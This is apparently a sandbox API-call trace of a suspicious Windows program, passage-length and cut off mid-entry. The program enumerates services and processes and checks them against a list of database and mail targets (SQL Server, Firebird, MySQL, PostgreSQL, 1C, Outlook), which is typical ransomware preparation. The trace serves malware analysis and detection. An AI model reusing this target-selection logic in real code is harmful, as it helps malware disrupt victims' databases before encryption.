[0046.702] lstrlenW (lpString="LanmanWorkstation") returned 17 [0046.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.702] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0046.702] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0046.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0046.702] lstrlenW (lpString="lmhosts") returned 7 [0046.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0046.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0046.702] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0046.702] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0046.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0046.702] lstrlenW (lpString="MMCSS") returned 5 [0046.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0046.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0046.702] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0046.702] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0046.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0046.702] lstrlenW (lpString="MpsSvc") returned 6 [0046.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0046.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0046.702] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0046.702] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0046.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0046.702] lstrlenW (lpString="Netman") returned 6 [0046.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0046.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0046.702] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0046.702] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0046.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0046.702] lstrlenW (lpString="netprofm") returned 8 [0046.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0046.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0046.703] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0046.703] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0046.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0046.703] lstrlenW (lpString="NlaSvc") returned 6 [0046.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0046.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0046.703] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0046.703] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0046.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0046.703] lstrlenW (lpString="nsi") returned 3 [0046.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0046.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0046.703] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0046.703] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0046.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0046.703] lstrlenW (lpString="PcaSvc") returned 6 [0046.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0046.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0046.703] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0046.703] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0046.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0046.703] lstrlenW (lpString="PlugPlay") returned 8 [0046.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0046.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0046.703] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0046.703] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0046.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0046.703] lstrlenW (lpString="Power") returned 5 [0046.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0046.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0046.703] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0046.703] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0046.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0046.703] lstrlenW (lpString="ProfSvc") returned 7 [0046.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0046.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0046.704] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0046.704] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0046.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0046.704] lstrlenW (lpString="RpcEptMapper") returned 12 [0046.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.704] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0046.704] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0046.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0046.704] lstrlenW (lpString="RpcSs") returned 5 [0046.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0046.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0046.704] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0046.704] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0046.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0046.704] lstrlenW (lpString="SamSs") returned 5 [0046.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0046.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0046.704] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0046.704] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0046.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0046.704] lstrlenW (lpString="Schedule") returned 8 [0046.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0046.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0046.704] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0046.704] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0046.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0046.704] lstrlenW (lpString="SENS") returned 4 [0046.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0046.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0046.704] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0046.704] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0046.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0046.704] lstrlenW (lpString="ShellHWDetection") returned 16 [0046.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.705] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0046.705] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0046.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0046.705] lstrlenW (lpString="Spooler") returned 7 [0046.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0046.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0046.705] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0046.705] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0046.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0046.705] lstrlenW (lpString="swprv") returned 5 [0046.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0046.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0046.705] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0046.705] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0046.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0046.705] lstrlenW (lpString="SysMain") returned 7 [0046.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0046.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0046.705] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0046.705] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0046.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0046.705] lstrlenW (lpString="Themes") returned 6 [0046.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0046.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0046.705] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0046.705] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0046.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0046.705] lstrlenW (lpString="TrkWks") returned 6 [0046.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0046.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0046.705] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0046.705] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0046.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0046.705] lstrlenW (lpString="UxSms") returned 5 [0046.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0046.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0046.706] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0046.706] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0046.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0046.706] lstrlenW (lpString="VSS") returned 3 [0046.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0046.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0046.706] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0046.706] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0046.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0046.706] lstrlenW (lpString="WdiServiceHost") returned 14 [0046.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.706] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0046.706] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0046.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0046.706] lstrlenW (lpString="WdiSystemHost") returned 13 [0046.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.706] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0046.706] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0046.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0046.706] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0046.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.706] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0046.706] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0046.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0046.706] lstrlenW (lpString="Winmgmt") returned 7 [0046.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0046.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0046.706] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0046.706] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0046.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0046.706] lstrlenW (lpString="WPDBusEnum") returned 10 [0046.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.707] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0046.707] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0046.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0046.707] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39606f0 | out: hHeap=0x570000) returned 1 [0046.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228 [0046.711] Process32FirstW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0046.711] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0046.712] lstrlenW (lpString="System") returned 6 [0046.712] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0046.712] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0046.712] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0046.712] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0046.712] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0046.712] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0046.712] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0046.712] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0046.715] lstrlenW (lpString="smss.exe") returned 8 [0046.715] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0046.715] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0046.715] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0046.715] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0046.715] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0046.715] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0046.715] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0046.715] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.716] lstrlenW (lpString="csrss.exe") returned 9 [0046.716] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0046.716] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0046.716] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0046.716] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0046.716] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0046.716] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0046.716] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0046.716] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0046.717] lstrlenW (lpString="wininit.exe") returned 11 [0046.717] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0046.717] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0046.717] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0046.717] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.718] lstrlenW (lpString="csrss.exe") returned 9 [0046.718] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0046.718] lstrlenW (lpString="winlogon.exe") returned 12 [0046.718] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0046.719] lstrlenW (lpString="services.exe") returned 12 [0046.719] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0046.719] lstrlenW (lpString="lsass.exe") returned 9 [0046.720] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0046.720] lstrlenW (lpString="lsm.exe") returned 7 [0046.720] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.721] lstrlenW (lpString="svchost.exe") returned 11 [0046.721] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.722] lstrlenW (lpString="svchost.exe") returned 11 [0046.722] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.722] lstrlenW (lpString="svchost.exe") returned 11 [0046.722] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.723] lstrlenW (lpString="svchost.exe") returned 11 [0046.723] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.724] lstrlenW (lpString="svchost.exe") returned 11 [0046.724] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0046.724] lstrlenW (lpString="audiodg.exe") returned 11 [0046.724] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.725] lstrlenW (lpString="svchost.exe") returned 11 [0046.725] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.726] lstrlenW (lpString="svchost.exe") returned 11 [0046.726] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0046.726] lstrlenW (lpString="dwm.exe") returned 7 [0046.726] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0046.727] lstrlenW (lpString="explorer.exe") returned 12 [0046.727] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0046.728] lstrlenW (lpString="spoolsv.exe") returned 11 [0046.728] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.728] lstrlenW (lpString="taskhost.exe") returned 12 [0046.728] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.729] lstrlenW (lpString="svchost.exe") returned 11 [0046.729] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0046.730] lstrlenW (lpString="taskeng.exe") returned 11 [0046.730] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.731] lstrlenW (lpString="taskhost.exe") returned 12 [0046.731] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0046.731] lstrlenW (lpString="called.exe") returned 10 [0046.731] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0046.732] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0046.732] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0046.733] lstrlenW (lpString="analyst.exe") returned 11 [0046.733] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, 